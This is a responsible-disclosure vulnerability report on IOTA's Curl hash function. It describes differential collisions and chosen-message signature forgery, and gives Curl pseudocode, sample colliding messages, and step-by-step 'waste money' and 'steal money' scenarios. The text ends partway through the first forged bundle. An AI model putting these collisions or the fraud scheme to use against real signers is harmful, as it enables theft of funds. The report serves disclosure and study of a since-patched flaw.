Skip to content

Latest commit

 

History

History
362 lines (243 loc) · 90.3 KB

vuln-iota.md

File metadata and controls

362 lines (243 loc) · 90.3 KB
Raw

IOTA Vulnerability Report: Cryptanalysis of the Curl Hash Function Enabling Practical Signature Forgery Attacks on the IOTA Cryptocurrency

By Ethan Heilman (Boston University, Paragon Foundation, Commonwealth Crypto), Neha Narula (MIT Media Lab), Thaddeus Dryja (MIT Media Lab, Lightning Network Dev), Madars Virza (MIT Media Lab, Zcash)

Team contact e-mail: curl@mit.edu

Summary: We present attacks on the cryptography used in the IOTA blockchain including under certain conditions the ability to forge signatures. We have developed practical attacks on IOTA’s cryptographic hash function Curl, allowing us to quickly generate short colliding messages. These collisions work even for messages of the same length. Exploiting these weaknesses in Curl, we break the EU-CMA security of the IOTA signature scheme. Finally we show that in a chosen message setting we can forge signatures of valid spending transactions (called bundles in IOTA). We present and demonstrate a practical attack (achievable in a few minutes) whereby an attacker could forge a signature on an IOTA payment, and potentially use this forged signature to steal funds from another IOTA user. This report provides example demonstrations of these vulnerabilities but does not detail the exact cryptanalytic process to generate the collisions. A later publication will provide an in-depth study of our cryptanalysis of Curl.

Responsible Disclosure statement: This report is the product of a responsible disclosure process. Over a month before publishing this report we disclosed these vulnerabilities to the IOTA developers. In response the IOTA developers have updated IOTA to no longer use the Curl hash function to hash transactions as part of the IOTA signing process. Curl is still used for other purposes in IOTA. We are now publishing our attacks since the IOTA developers have deployed their fixes. See our timeline of events below.

Our analysis is based on the IOTA open source repos on GitHub, the IOTA forum and email discussions with the IOTA developers during the disclosure process. At no time did we send any of these forged signatures to the IOTA network or interfere in the IOTA network in any way. We validated all of our attacks offline using the IOTA's publicly available reference implementations.

Interest Disclosure: Ethan Heilman is involved in cryptocurrency work with the Paragon Foundation and Commonwealth Crypto Inc. Madars Virza is a Science Advisor at the Zcash company. On May 8th, Dominik Schiener reached out to Ethan over Twitter to talk about IOTA. Nothing happened from that initial outreach.

1. Systems Impacted:

  • The Cryptographic Hash Function Curl: The cryptographic hash function Curl designed by the IOTA project has serious weaknesses (the IOTA developers asked us to refer to it has "Curl-P", but we declined since it is referred to as "Curl" publicly). We have demonstrated practical attacks which break Curl's collision resistance for messages of different length and the same length (note that the IOTA developers maintain that Curl is supported only on messages of the same length). We also demonstrate additional non-random behavior between certain classes of related messages, namely messages which are bit rotations of other messages (IOTA developers maintain that this is not a supported use of Curl). Curl should not be relied on for randomness or collision resistance. While IOTA is still using Curl for transaction ID generation and for proof of work, we present no attacks against these uses. We provide examples of collisions and non-random behavior at the end of the report. The IOTA team has deployed fixes to the vulnerabilities discussed in this report.

  • Prior versions of IOTA: The signature scheme used by IOTA prior to recent updates relied on the collision resistance of Curl for hashing messages as part of the signature algorithm. The attacks we developed against Curl led to practical signature forgery attacks against payments in IOTA. We provide an example forged signature on a valid IOTA payment (before the fix was deployed) at the of the report.

Mitigations: On Aug 7 2017 IOTA deployed a hardfork to their system to stop using Curl for signature message hashing. In order to perform the upgrade, deposits and withdrawals were halted on Bitfinex for roughly 3 days. All users who hold IOTA directly (not via an exchange) must upgrade their wallets and addresses.

The signature forgery vulnerability was fixed in IOTA Reference Implementation (IRI) version 1.3, IOTA wallet version 2.4.0.

2. Disclosure Timeline

  • July 14 2017: We disclosed a weaknesses in the Curl hash function to the IOTA developers and informed them that we were making steady progress on additional attacks. Because of these weaknesses we recommended that they replace the Curl hash function with a recognized and publicly vetted hash function. This disclosure included example collisions on messages of different lengths and an example of non-pseudo-randomness.

  • July 22 2017: We disclosed improved attacks on Curl and showed how these attacks could break the collision resistance of Curl even for messages of the same length. We also outlined how we could use these collisions to break the EU-CMA security of the IOTA signature scheme. This disclosure included an example collision we created via differential cryptanalysis.

  • July 25 2017: After continued discussion, the IOTA developers proposed a timeline for fixing these vulnerabilities. On Aug 5th Curl would be replaced with the KECCAK hash function (also known as SHA-3). Then on Aug 5th-10th users would move their tokens from Curl to KECCAK. On Aug 12th the IOTA devs would disclose the existence of the vulnerability.

  • Aug 7 2017: On Aug 7th the IOTA developers merged code which replaced Curl with a hash function they named Kerl. According to the Kerl specification is a ternary variant of the KECCAK hash function. Around this same time the IOTA developers posted a blog entry titled "Upgrades & Updates" which discussed the reasons for moving away from Curl stating:

Creating a new cryptographic hash function is no trivial undertaking, even when it is being built on preexisting world class standards. “Don’t roll your own crypto” is a compulsory uttered mantra that serves as a good guiding principle for 99.9% of projects, but there are exceptions to the rule. When spearheading technology for a new paradigm this statement is no longer axiomatic. Progress must march on. Therefore audits, reviews and continued research on Curl has been a given from day 1. One of the cryptographers we reached out to months ago to review Curl has disclosed that he is worried there might be a potential vulnerability in Curl. We have since had our internal team, as well as other cryptographers review it and asked the disclosing party for more information. While the party that did the responsible disclosure has been quite forthcoming, there are still some of the last details to be discussed more thoroughly with the respective teams in order to reproduce the claims and verify if there was even any vulnerability.

However, even though we have protection mechanisms in place that would render even most valid attacks useless in this ‘training wheel stage’ (due to the Coordinator and the higher-level protocol), as you are working on the cutting edge you have to take every precaution possible and always be on guard. Therefore we have made the simple decision to temporarily switch Curl with Keccak (SHA-3) for cryptographic signing in IOTA. - "David Sønstebø - Upgrades & Updates"

  • Aug 10 2017: We sent the IOTA developers IOTA payments (bundles in IOTA terminology) with different output addresses which hash to the same value under Curl as used in IOTA signatures (prior to the Aug 7th fix). We did not submit these bundles to the network, but we confirmed with the IOTA developers that each bundle independently would syntactically validate under IOTA bundle verification rules. This showed that not only could we forge signatures for some messages, but that these messages could potentially be valid payments in IOTA.

  • Sept 1 2017: We sent the IOTA developers valid IOTA payments which pay out different amounts and hash to the same value under Curl as used in IOTA signatures. This showed that under certain circumstances an attacker could exploit this cryptologic vulnerability in Curl to steal funds (prior to the Aug 7th fix). In the example Alice signs a payment paying Eve 100 IOTA, and Eve can use the signature on this payment to authorize a payment where Eve receives 129140263 IOTA from Alice's funds.

3. IOTA Background

The IOTA network launched July 11, 2016 and its token was listed on Bitfinex on June 14, 2017. A fixed supply of 2.77 Billion MIOTA (currency units) was created when the network was launched. 1 MIOTA (mega/million IOTA) is equal to 1,000,000 IOTA. As of September 6, 2017 IOTA has a market capitalization of $1.9B making it, at the time of writing, the 9th most valuable blockchain based cryptocurrency by market cap.

IOTA as it is currently deployed has several uncommon design features and terminology:

  • IOTA is built on the concept of a tangle (known also as a DAGchain or Directed Acyclic Graph Blockchain) where instead of a single chain of blocks, transactions are linked together in a graph. A transaction is a simple object specifying an address, signature, value, tag, and a few other fields. A group of transactions which together specify a transfer is called a bundle; in a bundle, transactions roughly correspond to Bitcoin inputs or outputs. Each transaction must include a small amount of proof of work, and point to two other transactions already in the Tangle.

  • IOTA uses balanced ternary (base 3) instead of binary (base 2). That is trits and trytes instead of bits and bytes. A tryte consists of three trits.

  • IOTA currently relies on a trusted party called a coordinator to approve and checkpoint state. This has led to concerns that IOTA is centralized. The IOTA developers argue IOTA is not centralized and that this is a temporary measure. The source code for the coordinator is not available for public inspection. Since we did not interact with the IOTA network, we cannot confirm how the coordinator would affect these proposed attacks.

4. Practical Attacks Against the Cryptographic Hash Function Curl

The IOTA team designed their own cryptographic hash function called Curl. It is used for a number of purposes in IOTA including transaction address creation, message digest creation, Proof-of-Work (PoW) and hash-based signatures. Unlike most cryptographic hash functions, Curl operates on base-3 numbers called “balanced ternary”. Curl is built on the popular sponge construction.

Curl takes a message, breaks it into message blocks and then interatively copies each message block into the current state and runs Transform on the state it update the state.

Curl(message)
    # the state consists of 729 trits. It is initalized to all zero.
    state = [0]*729
    
    # The message is broken into message blocks of size 243
    MB_0, MB_1, ... MB_n = split(message)
    for MB_i in MB_0, MB_1, ... MB_n:
        # The current message block is copyed into the first 243 trits of the state
	state[0:243] = MB_i
	state = Transform(state)
    
    # The output is the first 243 trits of the state
    output = state[0:243]
    return output

The function Transform used by Curl is an unkeyed permutation substitution network.

Transform(state)
    for round in 27
        i = 0
	new_state = [0]*729
	
        for pos in 729
            i = j
            j += (364 if j < 365 else -365)

            x = state[i]; y = state[j]
	    z = sbox[x, y]
	    new_state[pos] = z
	    
	state = new_state    
    return new_state

The sbox takes two trits and returns a third trit.

      y:  -1, 0, 1
    x: -1 [1, 1, -1]
    x:  0 [0, -1, 1]
    x:  1 [-1, 0, 0]

A close inspection of the Curl source code revealed that Curl was vulnerable to a well known technique for breaking hash functions called differential cryptanalysis. Using this observation, we were able write software that could quickly generate practical collisions for messages of the same lengths. Since these collisions fully collide the internal state of the hash function, a single collision enables us to generate an unbounded number of additional colliding messages. These collisions are for all rounds of Curl and can be generated in seconds on commodity hardware. The nature of our attack allows us great control over values of the colliding messages.

By "practical", we mean that we can efficiently compute these collisions on commodity hardware. Using 80 cores, we were able to find collisions in a few minutes.

Thus, Curl as used in IOTA does not provide collision resistance. We have provided example collisions and non-pseudo random behavior at the end of this report. In the next section we will show how we exploit these collisions to break the EU-CMA security of IOTA's signature scheme. Note that the IOTA developers maintain that their signing scheme does not depend on Curl's collision resistance.

5. Breaking the EU-CMA Security of the IOTA Signature Scheme

We are not exactly sure how IOTA specifies their signature scheme. We are using the definition of a signature scheme presented by Goldwasser, Micali and Rivest; namely, a signature scheme is a triplet of algorithms for key generation, signing, and verification, which jointly satisfy certain functionality and security properties. We refer to the Sign() and IsValid() functions in their code. Our communication with IOTA indicates their definition may be different.

IOTA's signature scheme is based on Winternitz One-Time Signatures (WOTS) with an important difference: IOTA operates on the hashes of messages instead of operating directly on messages as is done WOTS. This is a critical difference since WOTS only requires that the hash function is a One Way Function, whereas the IOTA signature scheme requires that the hash function must also be collision resistant. Important for our attack is that if two messages, msg1 and msg2, hash to the same output, a signature on msg1 will also verify as a signature on msg2.

IOTA_Sign(SK, msg):
    h_msg = CURL_Hash(msg)
    sig = WOTS_Sign(SK, h_msg)
    return sig

Before explaining more we need to provide some background on how the security of a digital signature scheme is defined. The standard security definition for a digital signature schemes is called Existential Unforgeability against a Chosen Message Attack or EU-CMA. Let’s break down what this means:

  • Existential Unforgeability (EU) means that the attacker should not be able to forge a signature for any message m even if the message m is complete nonsense.
  • A Chosen Message Attack (CMA) is an attack in which, before producing the forged signature on the message m, the attacker is allowed to ask for signatures on other messages m' different from m.

Thus, EU-CMA security guarantees that even if the attacker chooses two messages msg1, msg2 and the signer signs msg1, the attacker should not be able to find a valid signature for msg2.

Note that EU-CMA as defined here allows many requests for signatures for the same message. We believe this can be trivially adapted for a one-time signature scheme.

Breaking the EU-CMA security of IOTA’s signature scheme:

In our attack a malicious user, Eve, tricks a user Alice by asking Alice to sign a message msg1 and then later produces a different message, msg2, which also verifies under that signature.

(1). Eve uses our collision attack on Curl to chooses two messages, msg1, msg2 such that:
     CURL_Hash(msg1) = CURL_Hash(msg2) and msg1 != msg2

(2). Eve sends msg1 to Alice and asks Alice to sign it.

(3). Alice sends Eve a signature on msg1:
     sig1 = IOTA_Sign(SK,msg1)
 
(4). Eve produces a valid signature,message pair (sig1,msg2) where msg1 is a message which Alice has not signed.
     msg1 != msg2 AND IOTA_Sign(SK, msg1) == IOTA_Sign(SK, msg2)

By definition Alice has broken the EU-CMA security of IOTA’s signature scheme.

Forging Signatures on IOTA Payments:

IOTA uses a bundle to represent a transfer of value; a bundle consists of multiple transactions. These transactions specify the inputs and outputs of the transfer. We were able to produce pairs of bundles which differ by only one or two trits but hash to the same value, and so have the same signature. We can demonstrate a practical (achievale in a few minutes) attack where the signature on one valid IOTA payment could be used on a different valid IOTA payment. Such an attack, if deployed, could potentially cause an IOTA user to lose funds.

A transaction in IOTA has the following fields:

SignatureMessageFragment, 
Address, 
Value, 
Tag, 
Timestamp, 
CurrentIndex, 
LastIndex, 
BundleHash, 
TrunkTransactionID,
BranchTransactionID, 
Nonce

A bundle consists of multiple transactions, containing credits to the receiving addresses, debits from the spending addresses, and extra empty transactions which hold parts of the signature. Tags are only constrained by length, which we use to set up our attacks. The total value across all transactions in a bundle must sum to zero, and every transaction must contain two pointers to other valid transactions in the IOTA tangle (the trunk and branch transactions). A transaction ID is constructed by hashing the concatenation of every field in a transaction. The convention is that within a bundle, each transaction points to the transaction after it as its trunk transaction, and the last transaction in the bundle points to some other first transaction in a different valid bundle. The nonce must be calculated to provide sufficient proof of work for the transaction to get accepted into the tangle -- at the time of writing, this required that the transaction hash (including the nonce) ends with at least fifteen zero trits.

A user signs the hash of a bundle. A BundleHash, unlike a transaction hash, does not use all the fields in each transaction in the bundle. Instead, it is constructed by hashing the concatenation of only the following fields:

Address, 
Value, 
Tag, 
Timestamp, 
CurrentIndex, 
LastIndex

of all transactions in the bundle.

Waste money attack:

We use our method for generating collisions to construct two valid IOTA bundles which collide on one trit in the Address fields.

Alice wants to pay Eve:

(1). Eve creates two very specially constructed colliding bundles; bundle1 and bundle2. Bundle1 spends some of Alice’s funds and pays to Addr1. Bundle2 also spends some of Alice’s funds but differs in that it pays out to a slightly different address, addr2. 

(2). Eve asks Alice to pay Eve by signing bundle1, that is paying out to addr1.

(3). Eve takes the signature off of bundle1 and uses it on bundle2 which she then broadcasts to the network.

(4). Eve then tells Alice that Alice paid to the wrong addr and shows that Alice signed a transaction spending out to addr2 not addr1 as Eve asked. Eve then asks to be paid again.

Steal money attack:

We use our method for generating collisions to construct two valid IOTA bundles which collide twice on different trits. If Alice signs a bundle, bundle1, which pays Eve 100 IOTA from Alice's funds. Eve can use the signature on bundle1 as a valid signature on bundle2 which pays Eve 129140263 IOTA from Alice's funds.

Alice wants to pay Eve:

(1). Eve creates two specially constructed colliding bundles; bundle1 and bundle2. Bundle1 spends 939211930 IOTA from Alice’s address and pays 100 IOTA to Eve and 939211830 IOTA in change back to Alice. Bundle2 also spends some of Alice’s funds but differs in that it instead pays 129140263 IOTA to Eve and only 810071667 IOTA in change back to Alice.

(2). Eve asks Alice to pay Eve by signing bundle1, that is paying 100 to Eve and send the change 939211830 back to Alice.

(3). Eve takes the signature off of bundle1 and uses it on bundle2 which she then broadcasts to the network.

(4). When Bundle2 is confirmed, Eve will have stolen 129140163 IOTA from Alice.

This is an extremely serious attack as a signature attesting that "Alice pays Eve 100 IOTA", can also attest to "Alice pays Eve 129140263 IOTA" without Alice ever agreeing to pay Eve 129140263 IOTA. Signatures using Curl can no longer be trusted to authorize transactions.

What our attacks are not:

We emphasize that to produce a signature on a msg2, our attacks require Alice to sign an innocent-looking related message, msg1, of our choosing. This is a chosen message attack. We have not developed a known message attack.

One can posit a stronger goal for the attacker: produce signatures on msg2, without seeing Alice's signature on msg1. Our attacks do not achieve this much stronger goal.

That said, we believe that the two attacks above --- wasting and stealing Alice's money --- are both realistic and extremely serious.

As we said in Section 3, we did not test any of these attacks on the IOTA network. We therefore cannot predict what kind of role the IOTA coordinator would have in impacting this attack.

6. Proof-of-Concept - Curl Attack Examples

We provide examples of colliding messages for the Curl hash function and non-randomness. Our first two examples can be replicated using a short Python proof-of-concept program we have made available. We also provide longer colliding messages which can be replicated using the ccurl-digest commandline tool.

Short colliding messages:

Two messages which collide and differ by a single position. Our Python code for replicating this can be found here.

msg1 = "RETHT9ES9HRCUITBHVCUHOBPUUUHT9PHLUNWRWGKBKF9YUMDWRXTRVGZHFZEHGATZXZAUPGVEKNMQXFVRXHF9QJQHUTILIPIXUYRVSJEIOJDRIUVWMUABSIKIBAKENE9KVFJUEQUHFRVGELFGJIDXQARWH99XTORHXRETHT9ES9HRCUITBHVCUHOBPUUUHT9PHLUNWRWGKBKF9YUMDWRXTRVGZHFZEHGATZXZAUPGVEKNMQXFVR"
msg2 = "RETHT9ES9HRCUITBHVCUHOBPUUUHT9PHLUNWRWGKBKF9YUMDWRXTRVGZHFZEHGATZXZAUPGVEKNMQXFVRXHF9QJQHUTILIPIXUYRVSJEIPJDRIUVWMUABSIKIBAKENE9KVFJUEQUHFRVGELFGJIDXQARWH99XTORHXRETHT9ES9HRCUITBHVCUHOBPUUUHT9PHLUNWRWGKBKF9YUMDWRXTRVGZHFZEHGATZXZAUPGVEKNMQXFVR"

>hash1 =  H(msg1)
GIUNBQRBI9RJQPNDVSSMUFMTLAKWTGYDMGBUYZAJNOJSKXWTYBV9QO9LBAIEUANAXAIUTHKMNGRZKLSZN

>hash2 =  H(msg2)
GIUNBQRBI9RJQPNDVSSMUFMTLAKWTGYDMG~~~~~~~~BUYZAJNOJSKXWTYBV9QO9LBAIEUANAXAIUTHKMNGRZKLSZN

>print hash1 == hash2, msg1 == msg2
True False

Non-randomness:

Two messages which are bit rotations of each other when hashed result in outputs which are also bit rotations of each other. For example we choose the string KENNYLOGGINS.

msg1 = b'9999KENNYLOGGINS99999999999999999999999999999999999999999999999999999999999999999'
msg2 = b'9KENNYLOGGINS99999999999999999999999999999999999999999999999999999999999999999999'

hash1 =  H(msg1)
OBIVYFRBFRPRVNYMJFUGYYYFHREPKJWGLWCUSKDBQVOZSFYOPPOYGFTPQQA9ZMSYE99CMCYEELGEFRDTU

hash2 =  H(msg2)
VYFRBFRPRVNYMJFUGYYYFHREPKJWGLWCUSKDBQVOZSFYOPPOYGFTPQQA9ZMSYE99CMCYEELGEFRDTUXMW

Notice that the hash2 is exactly the same as hash1 but shifted by three characters: hash1 = OBIVYFRBFRPRV..., hash2 = VYFRBFRPRV...

Long colliding messages: Since the ccurl digest commandline tool made availaible by IOTA only works for msgs of exactly 2673 Trytes long, we provide colliding messages of length 2673. We used the lyrics to the [80's hit single "push it to the limit"](https://en.wikipedia.org/wiki/Scarface_(Push_It_to_the_Limit) in the colliding messages to demonstrate that we fully collide the internal state of curl and thus giving us arbitrary control over most of the message. We note that this internal state collision enables us to instantly create an unbounded number of other colliding messages.

$ ./ccurl-digest RETHT9ES9HRCUITBHVCUHOBPUUUHT9PHLUNWRWGKBKF9YUMDWRXTRVGZHFZEHGATZXZAUPGVEKNMQXFVRXHF9QJQHUTILIPIXUYRVSJEIOJDRIUVWMUABSIKIBAKENE9KVFJUEQUHFRVGELFGJIDXQARWH99XTORHXRETHT9ES9HRCUITBHVCUHOBPUUUHT9PHLUNWRWGKBKF9YUMDWRXTRVGZHFZEHGATZXZAUPGVEKNMQXFVRPUSHITTOTHELIMIT9WALKALONGTHERAZORSEDGE9BUTDONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99OPENUPTHELIMIT9PASTTHEPOINTOFNORETURN9YOUVEREACHEDTHETOPBUTSTILLYOUGOTTALEARN9HOWTOKEEPIT99HITTHEWHEELANDDOUBLETHESTAKES9THROTTLEWIDEOPENLIKEABATOUTOFHELL9YOUCRASHTHEGATESCRASHTHEGATES9GOINGFORTHEBACKOFBEYOND9NOTHINGGONNASTOPYOUTHERESNOTHINGTHATSTRONG9SOCLOSENOWYOURENEARLYATTHEBRINK9SOPUSHITOOHYEAH99WELCOMETOTHELIMITLIMIT9TAKEITBABYONESTEPMORE9THEPOWERGAMESSTILLPLAYINGSO9YOUBETTERWINIT99PUSHITTOTHELIMITLIMIT9NOONELEFTTOSTANDINYOURWAY9YOUMIGHTGETCARELESSBUTYOULLNEVERBESAFE9WHILEYOURESTILLINIT99WELCOMETOTHELIMITLIMIT9STANDINGONTHERAZORSEDGE9DONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99WELCOMETOTHELIMIT9PUSHITTOTHELIMITPUSHITTOTHELIMIT9WALKALONGTHERAZORSEDGE9BUTDONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99OPENUPTHELIMIT9PASTTHEPOINTOFNORETURN9YOUVEREACHEDTHETOPBUTSTILLYOUGOTTALEARN9HOWTOKEEPIT99HITTHEWHEELANDDOUBLETHESTAKES9THROTTLEWIDEOPENLIKEABATOUTOFHELL9YOUCRASHTHEGATESCRASHTHEGATES9GOINGFORTHEBACKOFBEYOND9NOTHINGGONNASTOPYOUTHERESNOTHINGTHATSTRONG9SOCLOSENOWYOURENEARLYATTHEBRINK9SOPUSHITOOHYEAH99WELCOMETOTHELIMITLIMIT9TAKEITBABYONESTEPMORE9THEPOWERGAMESSTILLPLAYINGSO9YOUBETTERWINIT99PUSHITTOTHELIMITLIMIT9NOONELEFTTOSTANDINYOURWAY9YOUMIGHTGETCARELESSBUTYOULLNEVERBESAFE9WHILEYOURESTILLINIT99WELCOMETOTHELIMITLIMIT9STANDINGONTHERAZORSEDGE9DONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99WELCOMETOTHELIMIT9PUSHITTOTHELIMITPUSHITTOTHELIMIT9WALKALONGTHERAZORSEDGE9BUTDONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99OPENUPTHELIMIT9PASTTHEPOINTOFNORETURN9YOUVEREACHEDTHETOPBUTSTILLYOUGOTTALEARN9HOWTOKEEPIT99HITTHEWHEELANDDOUBLETHESTAKES9THROTTLEWIDEOPENLIKEABATOUTOFHELL9YOUCRASHTHEGATESCRASHTHEGATES9GOINGFORTHEBACKOFBEYOND9NOTHINGGONNASTOPYOUTHERESNOTHINGTHATSTRONG9SOCLOSENOWYOURENEARLYATTHEBRINK9SOPUSHITOOHYEAH99WELCOMETOTHELIMITLIMIT9TAKEITBABYONESTEPMORE9THEPOWERGAMESSTILLPLAYINGSO9YOUBETTERWINIT99PUSHITTOTHELIMITLIMIT9NOONELEFTTOSTANDINYOURWAY9YOUMIGHTGETCARELESSBUTYOULLNEVERBESAFE9WHILEYOURESTILLINIT99WELCOMETOTHELIMITLIMIT9STANDINGONTHERAZORSEDGE9DONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99WELCOMETOTHELIMIT9PUSHITTOTHELIMITPUSHITTOTHELIMIT9WALKALONGTHERAZORSEDGE9BUTDONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99OPENUPTHELIMIT9PASTTHEPOINTOFNORETURN9YOUVEREACHEDTHETOPBUTSTILLYOUGOTTALEARN9HOWTOKEEPIT99HITTHEWHEELANDDOUBLETHESTAKES9THROTTLEWIDEOPENLIKEABATOUTOFHELL9YOUCRASHTHEGATESCRASHTHEGATES9

BUWSNIAGAYCVUPGUJMWIIYHR9DQAPVHRKHXPJKB9BTCKPUXTFSNPXIBHCIIYCJRAQJOGHXEYLXSJURUFS

$ ./ccurl-digest RETHT9ES9HRCUITBHVCUHOBPUUUHT9PHLUNWRWGKBKF9YUMDWRXTRVGZHFZEHGATZXZAUPGVEKNMQXFVRXHF9QJQHUTILIPIXUYRVSJEIPJDRIUVWMUABSIKIBAKENE9KVFJUEQUHFRVGELFGJIDXQARWH99XTORHXRETHT9ES9HRCUITBHVCUHOBPUUUHT9PHLUNWRWGKBKF9YUMDWRXTRVGZHFZEHGATZXZAUPGVEKNMQXFVRPUSHITTOTHELIMIT9WALKALONGTHERAZORSEDGE9BUTDONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99OPENUPTHELIMIT9PASTTHEPOINTOFNORETURN9YOUVEREACHEDTHETOPBUTSTILLYOUGOTTALEARN9HOWTOKEEPIT99HITTHEWHEELANDDOUBLETHESTAKES9THROTTLEWIDEOPENLIKEABATOUTOFHELL9YOUCRASHTHEGATESCRASHTHEGATES9GOINGFORTHEBACKOFBEYOND9NOTHINGGONNASTOPYOUTHERESNOTHINGTHATSTRONG9SOCLOSENOWYOURENEARLYATTHEBRINK9SOPUSHITOOHYEAH99WELCOMETOTHELIMITLIMIT9TAKEITBABYONESTEPMORE9THEPOWERGAMESSTILLPLAYINGSO9YOUBETTERWINIT99PUSHITTOTHELIMITLIMIT9NOONELEFTTOSTANDINYOURWAY9YOUMIGHTGETCARELESSBUTYOULLNEVERBESAFE9WHILEYOURESTILLINIT99WELCOMETOTHELIMITLIMIT9STANDINGONTHERAZORSEDGE9DONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99WELCOMETOTHELIMIT9PUSHITTOTHELIMITPUSHITTOTHELIMIT9WALKALONGTHERAZORSEDGE9BUTDONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99OPENUPTHELIMIT9PASTTHEPOINTOFNORETURN9YOUVEREACHEDTHETOPBUTSTILLYOUGOTTALEARN9HOWTOKEEPIT99HITTHEWHEELANDDOUBLETHESTAKES9THROTTLEWIDEOPENLIKEABATOUTOFHELL9YOUCRASHTHEGATESCRASHTHEGATES9GOINGFORTHEBACKOFBEYOND9NOTHINGGONNASTOPYOUTHERESNOTHINGTHATSTRONG9SOCLOSENOWYOURENEARLYATTHEBRINK9SOPUSHITOOHYEAH99WELCOMETOTHELIMITLIMIT9TAKEITBABYONESTEPMORE9THEPOWERGAMESSTILLPLAYINGSO9YOUBETTERWINIT99PUSHITTOTHELIMITLIMIT9NOONELEFTTOSTANDINYOURWAY9YOUMIGHTGETCARELESSBUTYOULLNEVERBESAFE9WHILEYOURESTILLINIT99WELCOMETOTHELIMITLIMIT9STANDINGONTHERAZORSEDGE9DONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99WELCOMETOTHELIMIT9PUSHITTOTHELIMITPUSHITTOTHELIMIT9WALKALONGTHERAZORSEDGE9BUTDONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99OPENUPTHELIMIT9PASTTHEPOINTOFNORETURN9YOUVEREACHEDTHETOPBUTSTILLYOUGOTTALEARN9HOWTOKEEPIT99HITTHEWHEELANDDOUBLETHESTAKES9THROTTLEWIDEOPENLIKEABATOUTOFHELL9YOUCRASHTHEGATESCRASHTHEGATES9GOINGFORTHEBACKOFBEYOND9NOTHINGGONNASTOPYOUTHERESNOTHINGTHATSTRONG9SOCLOSENOWYOURENEARLYATTHEBRINK9SOPUSHITOOHYEAH99WELCOMETOTHELIMITLIMIT9TAKEITBABYONESTEPMORE9THEPOWERGAMESSTILLPLAYINGSO9YOUBETTERWINIT99PUSHITTOTHELIMITLIMIT9NOONELEFTTOSTANDINYOURWAY9YOUMIGHTGETCARELESSBUTYOULLNEVERBESAFE9WHILEYOURESTILLINIT99WELCOMETOTHELIMITLIMIT9STANDINGONTHERAZORSEDGE9DONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99WELCOMETOTHELIMIT9PUSHITTOTHELIMITPUSHITTOTHELIMIT9WALKALONGTHERAZORSEDGE9BUTDONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99OPENUPTHELIMIT9PASTTHEPOINTOFNORETURN9YOUVEREACHEDTHETOPBUTSTILLYOUGOTTALEARN9HOWTOKEEPIT99HITTHEWHEELANDDOUBLETHESTAKES9THROTTLEWIDEOPENLIKEABATOUTOFHELL9YOUCRASHTHEGATESCRASHTHEGATES9

BUWSNIAGAYCVUPGUJMWIIYHR9DQAPVHRKHXPJKB9BTCKPUXTFSNPXIBHCIIYCJRAQJOGHXEYLXSJURUFS

Other Collisions: We also note that there are several trivial methods to generate collisions for different message lengths in Curl, but these do not appear to impact the security of IOTA. These can also be found in our python example code. The developers of IOTA maintain that executing Curl on messages of different lengths is an unsupported use of the Curl hash function.

7. Proof-of-Concept - IOTA Signature Forgery Examples

We provide two examples of a signature forgery attack we executed using valid IOTA bundles. We provide instructions to replicate our signature forgery attacks here. Colliding bundles given below.

Waste Money Attack

These two bundles demonstrate the signature forgery "waste money" attack described earlier in the report. A signature on BURN_BUNDLE1 is also a valid signature for BURN_BUNDLE2.

var BURN_BUNDLE1 []string = []string{
	"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999ROQDJLWUDUXBKHJ9PNUPEBYLSJTSAT9RCKFVTCJFDUKHZJUDSSTELTIRA9DHKPUZTGSHAZNJKOFFKAXXPWPOC99999999999999999999999IOTFORALL999999999999999999QONOPXD99999999999C99999999UXOTHHZPYHAKLQNOYGHUFDNIQORRPQVRXQPVCZEWEMPHVIJB9OJIDB99ZJAZLFMXNOKBRSDG9HXSOLGLBJKUMDNFCXZYGXRPEOEASTXNGCZHHBAWRMJFURVDDGEEVAXNOIYSSI99ZJPMDUPWBFESIOQQZLOTB99999999999999999999999999999999999999999999999999999999999999999999999999999999999999TPMXBQHLAIHHRVEBB9DWBFYQSTTTDYUAPXXFRNEFWYCKHWJRIVH9VIXZJXMKVJEFVEIOWSSQJFVVRMBKE",
